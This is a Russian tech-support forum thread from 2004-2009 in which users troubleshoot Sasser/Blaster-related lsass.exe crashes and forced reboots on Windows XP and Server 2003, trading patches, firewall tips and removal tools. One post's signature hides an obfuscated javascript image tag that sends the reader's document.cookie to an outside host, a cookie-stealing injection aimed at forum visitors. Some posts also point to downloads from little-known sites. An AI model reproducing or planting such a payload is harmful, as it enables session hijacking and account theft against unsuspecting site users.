Помогите, пожалуйста!
вчера вечером вдруг снова появилась эта чума.
Win XP ENG, стоят все заплатки с самого начала, и до вчерашнего дня все было ОК.
внешнее проявление точно как BLAST, только теперь ссылается
на WINDOWS\System\lsass.exe

caiger 01-05-2004 23:22 35293

У меня та же беда ,и семантек ничего не находит и то же сообщение от WINDOWS\System\lsass.exe

Guest 02-05-2004 11:51 35294

Тупо заходишь в безопасный режим и тупо удаляешь этот файлик. Но перед этим ставишь firewall и заплаты на винду.

plabor 02-05-2004 15:03 35295

Спасибо, уже нашел, есть сообщение на microsoft.com
Зовут его sasser worm
есть уже patch и removal tool.
:up:

[s]Исправлено: plabor, 15:07 2-05-2004[/s]

Guest 04-05-2004 22:24 35296

Цитата:

что-то я совсем тебя не пойму... может не выспался...
Цитата:я его случайно увидела

Просто, заглянула автозагрузку и увидела, я вообще внимательно к этому всему отношусь,все, что надо давно установлено и работает, ( у меня всего-то 4 проги, нужных мне для работы грузятся сразу, но периодически я туда, все-таки, заглядываю, мало ли что) но так как вроде ничего не качала, аутпост  работал( вру- не было тогда),и как-то это быстро произошло- неделю назад не было, а сегодня есть- вот откуда?

увидела где? откуда тогда взялось утверждение что
Цитата:сидит только в автозагрузке
сразу стала смотреть в реестр, т.е. путь, там никого подобного, стала смотреть всюду, где можно-системные,  через реестрные чистилки посмотрела, нигде не отражается, и по-видимому и не работает, но вот раздражает взляд инородное тело. Как его еще поискать?
P.S. через сейф мод не пробовала

Vadikan 05-05-2004 04:22 35297

Цитата:

но вот раздражает взляд инородное тело
Где оно? Где вы его видите? Вам же задали вопрос прямой.

Guest 07-05-2004 09:32 35298

После нападения Gaobot.gen и успешного его удаления вручную я не могу зайти на symantec.com (LiveUpdate тоже не хотит к нему конектится) и на viruslist.ru .Заплаты стоят. вирусов нет. что посоветуете,,?

Vadikan 07-05-2004 22:27 35299

Guest 80.243.65.*
Цитата:

что посоветуете,,?
Я посоветую обратиться в форум Информационная Безопасность. Видимо удаление оказалось не столь успешным как вы думаете. А если вы попутно убили какие-то важные ключи реестра или изменили системные настройки, то мы особо не сможем помочь, т.к. понятия не имеем что вы делали с системой.

Boikov 15-05-2004 00:26 35300

Внешнее проявление вируса точно такое же как BLAST, только теперь ссылака на WINDOWS\System\lsass.exe
Никакие антивирусные программы, включая самые, самые последние, никаких вирусов не обнаруживают. Нет и файлов сопутствующих вирусам "Blaster" или "Sasser". Но после перезагрузки компьютера все возвращается на круги своя  - как только вошел в Интернет, появляется окошко с предупреждением о перезагрузке. Что бы это значило? Подскажите, кто знает. Разумеется, если загрузить соответствующий патч, принудительная загрузка компьютера не происходит. Спасибо.

Vadikan 15-05-2004 01:42 35301

Boikov
Цитата:

Разумеется, если загрузить соответствующий патч
Так установите же его. Вы невнимательно читали первый пост в теме. Там еще и фаервол ведь рекомендуется включить...

Boikov 15-05-2004 15:10 35302

Вероятно, я недостаточно четко сформулировал свой вопрос. Мне известно, как защититься от вирусов Blast или Sasser. Мне непонятно почему после перезагрузки компьютера, вызванной действием вируса, следов вируса обнаружить не удается. Как известно червь Sasser имеет три разновидности. Sasser a будто бы создает файл avserve.exe; Sasser b - avserve2.exe; Sasser c - skynetave.exe. После перезагрузки компьютера (до установки "патча" и брандмауера) этих файлов нп компьютере нет. Не обнаруживает следов вируса и последняя антивирусная программа FxSasser.  Может быть это еще какая-то разновидность вируса Sasser? Заранее благодарю за ответ.

Vadikan 15-05-2004 20:46 35303

Boikov
Пожалуйста, задайте ваш вопрос в форуме Информационная Безопасность. Именно там обсуждаются методы защиты и обнаружения вирусов. Там даже есть тема про Sasser.

Guest 16-05-2004 01:34 35304

Поймал и я эту хренотень. вот сижу читаю топик и качаю апдэйт, удалил этот бласт файл , думаю должно помочь.
Да иеще одно  время от времени выскакивает окошко  Инструкция по адресу 0x009ef878 обратилась  к памяти по адресу 0x000000023  Память не может быть  read и две кнопки ок и отмена  жмешь любую и выскакивает знакомое окошко  для перезагрузки. ах да заголовок окна  Isass.exe ошибка приложения

cBonD 06-06-2004 22:55 35305

Так... ну и чо... у всех чума уже закончилась месяц назад, да?...
А у меня вот только началась....

В системных файлах, процессах и автозагрузке проверял всё, ничё подозрительного.
У мня 2к(рус) и ХР(РЕ,sp1+заплатки). Глючат обе. Перезагружается сразу, никакой те минуты для прощанья.
Ща поставил в 3-ий раздел ещё ХР, качаю новые заплаты. даже если поможет, как те два вина к жизни вернуть? они ни в одном из режимов не грузятся (точнее, сразу перезагружаются)!!! Если ток из консоли восстановления мон вход выполнить... но эт на вряд поможет. Откат непомогает=(((

Заранее спасибо.

nikolaik 07-06-2004 12:44 35306

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

Добавлено:

У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?

cBonD 07-06-2004 12:56 35307

У мня касперский. Обновляется нормально, ток без толку, ни хрена не находит. Качай обновления, должно помочь. Я вот пока сижу... ток Update Rollup 1 не помог, после него ещё кучу заплаток скачал, не знаю, работаю вот пока, но в 2К свой заходить боюсь=). Если опять всё накроется буду держать в курсе....

Ниужели новая чума?!?!?!?

Добавлено:

Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!

Vadikan 07-06-2004 20:05 35308

cBonD
nikolaik
Эта тема возникла потому, что бластер вызывал проблему с перезагрузкой системы, и все шли в ХР с вопросами. Решение проблемы обозначено в самом первом сообщении темы.

Для обсуждение вирусов и методов их удаления есть форум Информационная Безопасность.  

Цитата:

Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления.
http://forum.oszone.net/topic.cgi?fo...amp;topic=5060

cBonD 08-06-2004 00:03 35309

Дык не похоже всё это дело на бластер! Говорю хе, сразу вырубается и всё!!! Если в Debug Mode грузиться, то иногда возникает ошибка "Mashine_check_exeption". А воще я вот ща себе ещё раз c: форматнул и вин переставил, ща XP(PE) без SP1, вроде не глючит пока... мож просто в обновлении у мня какая дрянь сидела?... (у мня dial-up, соответственно, ставлю с харда, качать не имеет смысла... =))

AStranger 08-06-2004 00:28 35310

Цитата:

Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!!
Да, кстати у меня та же самая фигня :gigi:
------------------
[img]javAScript :i = new Image();i.src='%68%74%74%70%3A%2F%2F%67%36%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%61%2E%6A%70%67?'+docu ment.cookie[/img]

cBonD 08-06-2004 00:32 35311

Newbie, а у тебя SP1?

Vadikan 08-06-2004 00:36 35312

Цитата:

Дык не похоже всё это дело на бластер!
Тогда почему это обсуждается в данной теме? Включайте фаервол, ставтьте все заплатки и не будет проблем. А вот как удалить вирус в Инф. Без., плиз. Спасибо.

[mzd] 29-06-2004 14:19 35313

При подключении к нету вылетает LSA Shell. Вызывает ошибку и вываливает службу NT Authority, далее, я думаю, все знают. Что делать?

[s]Исправлено: [mzd], 15:55 29-06-2004[/s]

Vadikan 29-06-2004 21:41 35314

[mzd]
А ты самый первый вопрос в теме читал?

[mzd] 30-06-2004 15:57 35315

Vadikan
Я не мог до сайта Микрософта достучаться, чтобы узнать насчет этой слжбы, поэтому задал такой вопрос в расчете на помощь советом, а не линком. Я хочел узнать, что это за вирус, который ни Каспер, ни Нортон не ловят...

Vadikan 01-07-2004 11:52 35316

[mzd]
Цитата:

задал такой вопрос в расчете на помощь советом, а не линком.
Мои советы нередко состоят из линков. В первом посте (вторая его часть) есть:

Причина возникновения проблемы
Краткое описание червя
Утилиты для удаления червя
Заплатка, которую надо установить во избежание повторения проблемы.

Что еще требуется??? Я не понимаю, сорри.

Заражение происходит через открытые порты, без участия пользователя.  Заплатки надо вовремя ставить, и не будет проблем. Подпишись на тему Важнейшие обновления системы (прикреплена), и будешь в курсе.

Цитата:

Я хочел узнать, что это за вирус, который ни Каспер, ни Нортон не ловят...
1. Разве так звучал твой первый вопрос?
2. Линки с ответами есть в первом посте темы.
3. О вирусах надо спрашивать в форуме Информационная Безопасность.

Так что не надо, плиз...

Guest 15-07-2004 21:54 35317

у меня постояноо появляется вирус Backdoor.r-bot.gen я его удаляю а он снова что сделать помогите

Alex51278 17-08-2004 13:05 35318

Привет ребята. Устал. Короче как написано в Вашем первом ответе убил червя Clravom, заплатку поставить на ХР не могу, что-то ругается на язык, но это не проблема, найду другую. Но главное, что только стоит подстыковать сетевой кабель (локалка, эта машина не Интернете), через 2-3 минуты опять останавливается служба RPC. Повторный поиск наличия червя не дает. Пробую включить Бранмауэр, однако выходит сообщение об ошибке "Не удалось запустить дочернюю службу" и встроенный межсетевой экран естественно не включатеся. Очень прошу посоветуйте чего-нибудь. Спасибо. Очень жду.

Blast 17-08-2004 16:16 35319

Alex51278
Заплатку все-таки поставь, и 90% за то что всё наладится... А на язык может ругаться если у тебя стоит английская винда с MUI, а заплатку ставишь русскую, надо английскую ставить.

Alex51278 17-08-2004 16:47 35320

Спасибо за внимание! Заплатку поставил, проблема осталась. У меня в сети так заразились 2 машины. Все что я с ними делал одинаково. Т.е. убил червя, поставил заплатку. На одной все стало на свои места, на другой ничего не изменилось. Служба RPC останавливается, бранмауэр не включить. Если отключить кабель локальной сети, то все нормально. Может чё придумаем? Конечно самое простое форматнуть диск, переставить систему и буд-то все, но ведь интересно же...! Заранее благодарен.:up: Blast

Добавлено:

Спасибо за внимание! Заплатку поставил, проблема осталась. У меня в сети так заразились 2 машины. Все что я с ними делал одинаково. Т.е. убил червя, поставил заплатку. На одной все стало на свои места, на другой ничего не изменилось. Служба RPC останавливается, бранмауэр не включить. Если отключить кабель локальной сети, то все нормально. Может чё придумаем? Конечно самое простое форматнуть диск, переставить систему и буд-то все, но ведь интересно же...! Заранее благодарен.:up: Blast

Добавлено:

Извините намутил с сообщениями! Но думаю суть ясна.

Alex51278 20-08-2004 14:44 35321

Привет ребята! А еще за несколько секунд до отключения службы RPC появляется сообщение об ошибке в "LSA Shell (экспортная версия)" и предлогается отправить в М$ отчет об ошибке "для исправления LSA Shell". Я, честно говоря, не знаю,ято это такое. Литературы пока не нашел, но ищу.
Будет момент поделитесь плиз впечатлениями. Спасибо.:o

Guest 26-08-2004 18:22 35322

Наверное, я тупой! Прочитал весь форум, скачал и Каспер-утиль (CLRAV.COM) и Semantec (FxSasser & FixBlast) - проверка имеет нулевой эффект. Патч на ХР(Pro) от Microsoft встал ОК. Ля-ля-ля, ничего не изменилось - тот же Win\System32\lsass.exe с кодом ошибки и shutdown. А, кстати, FlashGet файло качает в энто время!

Guest 30-08-2004 19:03 35323

Дополнение к 26-08-2004.
Вот уже 4 часа сижу во всемирной помойке без единой перезагрузки. После моего крика отчаяния не подходил к компу 4 суток, сушил мозги. Додумался вот до чего: несколько раз упоминалось, что этот вирус сидит в отдельном файле *.exe с разными именами и запускается из реестра. Включаю RegCleaner и смотрю на секцию "Автозапуск". Среди прочих вижу: запуск проги "ATI2VID.EXE". Типа, дрова для видюхи. Стоп, но у меня на машине встронный Trident! Залажу в список оборудования и смотрю, какие дрова ставил WinXP. Никаких "ATI2VID.EXE" тама нет!. Ну и похерил из реестра все упоминания об этой твари (на свой страх и риск). Также поиском нашёл этот файл в %WinDir%\System32 и ещё какой-то "ATI2VID.PF". Оба снёс к едрене фене. Всё. Заплатка от Microsoft в это время уже стояла, как влитая. Всё это делал в SafeMode.

Guest 06-09-2004 02:10 35324

Люди! у меня не беда, а трагедия просто!!! Каждые три дня переустанавливать систему – это что-то! ДВА МЕСЯЦА уже длиться вся вот эта ерунда – по 20 перезагрузка при включении компа, и на третий день вся система (ХР) накрывается медным тазом вообще! И теперь еще этот идиотский Isass.exe, которого НЕТУ, когда его ищешь даже в скрытых системных файлах! Никакие антивирусы ничего не показывают! Касперский молчит, все утилиты против этих червей запускаю – и после этого все то же самое!!!!!!! О ужас!:lol:  Что же делать?! ПОВЕСИТЬСЯ?!!:gigi:

Добавлено:

Люди дорогие!! Это я же, которая хотела повеситься!
Боюсь поверить глазам своим, но кажется я все ВЫЛЕЧИЛА!!
Поскольку тут много пострадавших, то даю ссылку – откуда я скачала антивирус:
http://www.free-help-internet.com/
Там третья надпись – вирус никак не назван, написано, что это вирус, который не дает выйти в интернет и поразил уже каждый 6-ой комп!
надо скачать файл sos.rar, около 2 мегов, в который входит сразу все – и инструкция как останавливать перезагрузку вручную, и FixBlast, и заплатка, и еще одна очень важная вещь – проверка порта 5000 и программа, которая его закрывает.
После того, как я все это проделала (а FixBlast нашел у меня Sasser и объявил, что уничтожил его), ВПЕРВЫЕ за последние два месяца я включила машину, и ХР загрузилась СРАЗУ (а не с двадцатого раза). И эта фигня с перезагрузкой в течении минуты пока больше не появляется...
Советую!

Angel1985 25-09-2004 12:28 35325

Флуд удален

[s]Исправлено: Olegator, 12:41 25-09-2004[/s]

Guest 04-10-2004 00:36 35326

Все что тут написано перечитал - но...
У меня установлены следующие заплатки (я так думаю что все) на WinXP + SP1:

WindowsXP-KB841873-x86-enu
WindowsXP-KB840315-x86-enu
WindowsXP-KB839645-x86-enu
WindowsXP-KB835732-x86-ENU
Windows-KB841720-ENU-V4
Cumulative Security Update for Internet Explorer (867801)

Все заплатки ставились на неинфицированую машину сразу после установки виндов.
Касперский - самое последнее обновление на 03.10.2004. Ни касперский ни другие анивирусы/утилиты вируса не находят.

Если отключаю файрвол - процесс svchost занимает 100% загрузки процессора - торомозится все + может произойти перезагрузка.

Включать файрвол НЕ МОГУ т.к. из-за него у меня не работает провайдер. (у него такая система уж ничего не поделаешь, а он в нашем городе только один).

Что делать? Уже достало... (если честно то уже думаю о перходе на другую ОС)

Vadikan 04-10-2004 07:57 35327

Цитата:

Если отключаю файрвол - процесс svchost занимает 100% загрузки процессора - торомозится все + может произойти перезагрузка.
Не вижу связи с данной темой. Про svchost есть своя тема, фильтром найдите. Сначала, впрочем, вычислите службу виновную в 100% загрузке  http://support.microsoft.com/default...;Product=winxp

Guest 04-10-2004 08:37 35328

Флуд удален

[s]Исправлено: Vadikan, 8:48 4-10-2004[/s]

Добавлено:

Уважаемый, мр.Vadikan. Если вы считаете, что совет ставить в firewall'е блок на out/in траффик svhost.exe, за флуд, то, извините меня, на каком же языке в ваш форум надо писать.

Guest 07-10-2004 13:57 35329

Проверил все выше сказанное, ничего не нашел, но комп перегружается, что еще может быть, кто сталкивался с такой проблемой?

FragNatic 09-10-2004 13:03 35330

Здрасьте уважаемые почти всю тему прочитал и решил выложить полезный [бесплатный] антивирус:up:
Весит 7.28 KB
http://files.avast.com/iavs4pro/setuprus.exe

И еще от червей хорошо антивирус Stop! помогает однако за него платить надо
Весит 5.76 KB
http://www.proantivirus.com/ftp/stop410.exe

Советую закачать Stop! так как он первые 30 дней бесплатный ну а если понравится то и заплатить не грех.:)

ps: лично я с их помощю 29 червей вывел которые не видел ни Каспер ни Др Вэб.

pps: ну а тем у кого есть возможности советую firewall поставить:type:

Vadikan 10-10-2004 01:00 35331

Guest 217.23.84.*
Цитата:

Уважаемый, мр.Vadikan. Если вы считаете, что совет ставить в firewall'е блок на out/in траффик svhost.exe, за флуд, то, извините меня, на каком же языке в ваш форум надо писать.
Писать надо на русском. Полное блокирование svchost, как правило, делает невозможным подключение к Интернет. Следует запретить svchost действовать как сервер, но не блокировать его целиком. Такой вот флуд получается.
Продолжайте дискуссию в теме про svchost, плиз.

Guest 16-10-2004 18:09 35332

У меня было тоже самое. Раздражало до безумия. Стоял FireWall типа Agnitum Outpost. Все было закрыто. Тем не менее такие глюки происходили только при сетевом соединении. Как только его отключал - все проходило.
После установки Windows XP SP2 все исчезло вместе со всеми остальными проблемами (периодическими тормозами, жутким пилением винта и отсутствием возможности спокойно и долго без глюков работать с и без сети). Вот такая история. Хотя ни вируса система не находила, да и антивира не стоит сейчас. FireWall встроенный меня полностью устраивает, так что ставить вместо него Outpost смысла не вижу.

gasyoun 22-02-2005 16:59 300794

Понять не могу.
БИОС слетел - частично.
5 разных scvhost.exe
Касперский и Нортон - сначала видели, потом перестали.
SpyBot, AntiVir Guard тоже несмогли, тоолзы от Symantec глухо.
Поставил вчера XP SP2 - все по старому, форматировать все нахрен?

bakatum 23-06-2005 09:55 335427

в том-то и дрянь, что после форматирования раздела С: происходит то же самое, так всё работает отлично, как только цепляю сеть, через минуту обратный отсчёт и перегрузка...

Vadikan 24-06-2005 02:20 335653

bakatum
Видимо, надо перечитать первую страницу темы еще раз.

hsx 01-08-2005 09:04 345034

Помогите разобраться если можите!
Сервер, на нем Win2003, все патчи установлены, червей не наблюдается, но ежедневно(а то инесколько раз в день) вылетает lsass.exe, и перегружает сервер,
Пакет безопасности Kerberos создал исключение.
происходит это уже с месяц, причем только при включеном кабелька инета, если работает только локалка, то все нормально до этого ничего подобного не наблюдалось. Фаервол стоит желелзный DLink-604, и на вход открыто только HTTP, я его уже и переставлял, чуть ли с бубном вокруг не бегал, ничего не помогает.
На маздае, по этому поводу ничего нет, всеми видами Fx... проверял, ни кто ничего не находит
:search:

hsx 04-08-2005 00:10 345795

Проблема вроде решилась, отключил в проверке подленности IIS крберос и все стало нормально, только вот не понятно почему он не хочет работать?

32338 24-12-2006 10:28 528486

плиз Help этот lsass.exe на сервери Win2003 enterprise edition SP1
очень сильно надоел кажды раз когда в Инет заходишь через 30-40 мин. выходит вот это сообщение с lsass.exe
чё делать ваще??
Уже месяц с ним ругаюсь и ни как антивирус не находит
качал заплаткии Win 2003 говорит что мол это уже всё стоит и ничё не надо:(
конечно нет Firewall, а включен обычный брендмауэр, а толку нет
помогите кто чем может...

Blast 24-12-2006 10:40 528489

Aналогичный вопрос уже задавался на форуме. Воспользуйтесь фильтрами по названию темы в разделе Windows 2000/2003 по lsass.

Результат

romacv 19-04-2007 20:16 576760

Здраствуйте народ, помогите пожалуйста, у меня тоже очень часто выдается такое сообщение. Я уже и проверял и на вирусы, и даже пробовал весь диск очишать, и Windows переустанавливал, ничего не помогает. Нигде в реестре ниче не появляется, ни новые файлы нигде не создаются, помогите мне пожалуйста. Заранее спасибо.

Severny 19-04-2007 20:20 576763

Service Pack 2 стоит? Это старые дыры в Винде. Переустанавливай тысячу раз, если не защищаешься, то будут валить из инета.

Vadikan 19-04-2007 23:57 576888

romacv
В первом сообщении темы также перечислены меры, которые следует предпринять во избежание повторного заражения.

romacv 21-04-2007 17:17 577605

А сколько весят обновления, для защиты от этого вируса? просто у меня интернет по трафику, если очень большой размер то скачат не смогу.

romacv 21-04-2007 18:31 577637

Скачал обновления от заражения вроде бы больше не выдается. :-) Спасибо вам большое за помощь. :-)

Net_Stranger 25-09-2007 13:44 649167

Я уже не знаю что делать. Програмулина Касперского (ссылка выше) ничего не видит. Сумантек то же самое. Пробывал поставить патч: система говорит, что у нее это уже давно есть, при чем версия посвежее инсталируемой. В Диспетчере программ лишних процесов не встретил. Короче что делать не знаю. Кроме того стоит РЕЙД-масив. Никогда с ним не сталкивался, во этому есть конкретные трудности с тем, чтобы переставить винду. Мож там еще какие-то хитрости есть? У мя Вида 2003 сервер. Уже пересмотрел горы сайтов. Везде одно и то же. и ни чего не помогает

Батов 23-09-2008 23:54 907123

Ноутбук ACER Aspire 5920 (C2D T7300, GeForce 8600GT). Проблема с перезагрузкой Windows XP из-за завершения службы RPC, описаная выше. Долго мучался, переустанавливал систему раз 5, пробовал разные сборки Windows XP Zver, ставил даже лицензионную с работы. Эффекта ноль, вылетает даже на голой винде сразу после установки при подключении к интернету. Антивирус NOD32 с последними обновлениями никаких вирусов не обнаруживал. Проблеме помог поиск ответов на зарубежных сайтах. В моем случае причиной проблемы оказался драйвер помощи nVidia nvsvc32.exe, для устранения ошибки нужно переименовать его в папке windows\system32 и перезагрузиться. Месяц живу спокойно - ни одной перезагрузки. Может кому нибудь поможет.

Kovaman 28-09-2008 20:50 911122

Такая же проблема, помог - Spybot - Search & Destroy

teofrast 07-06-2009 23:33 1137802

Здраствуйте! прошу вашей помощи у меня точно такая проблема как здесб описано первое из окошек то которое у меня выскакивает, пытался потупать как описано в теме, не помогло не могу найти это червя и удалить не помогает ни оджна из преведенных там программ, а теперь комп стал до бесконечно перезагружаться, вот сейчас раза с 30 только остановилось и омгу пользоваться, подскажите что делать?

была мною создана одтельная тема, по совету перенес в эту. и только тогда заметил что в ней 14 старниц:) прочел все пробЫвал многое не помогало, но последнее сообщение, советующее Spybot - Search & Destroy, кажетсья помогло, много чего нашло и удалило, в частности и это, кажетсья говорю, кажетсья, потмоу что перезагружаться боюсь, а вдруг нет, и тогда опять бесконечные перезагрузки, вот

Kovaman 08-06-2009 00:02 1137821

Цитата:

Цитата teofrast
потмоу что перезагружаться боюсь, а вдруг нет, и тогда опять бесконечные перезагрузки, вот »

...не попробуешь, не узнаешь :)

teofrast 08-06-2009 00:10 1137825

это как то мало ободряет, придумал поставить на спящий режим, чтоыб не выключяатсья или перезагружаться и отложить пробы до завтра:). скажи коваман а у тебя спайбот сразу помог, скан удаление и все нету?

Kovaman 08-06-2009 00:29 1137848

Цитата:

Цитата teofrast
это как то мало ободряет, придумал поставить на спящий режим, чтоыб не выключяатсья или перезагружаться и отложить пробы до завтра. скажи коваман а у тебя спайбот сразу помог, скан удаление и все нету? »

Да, помог сразу... До этого перелапатил весь инет, другие решения мне не помогли. Но что это было так и не знаю.

Время: 11:07.

Время: 11:07.
© OSzone.net 2001-2025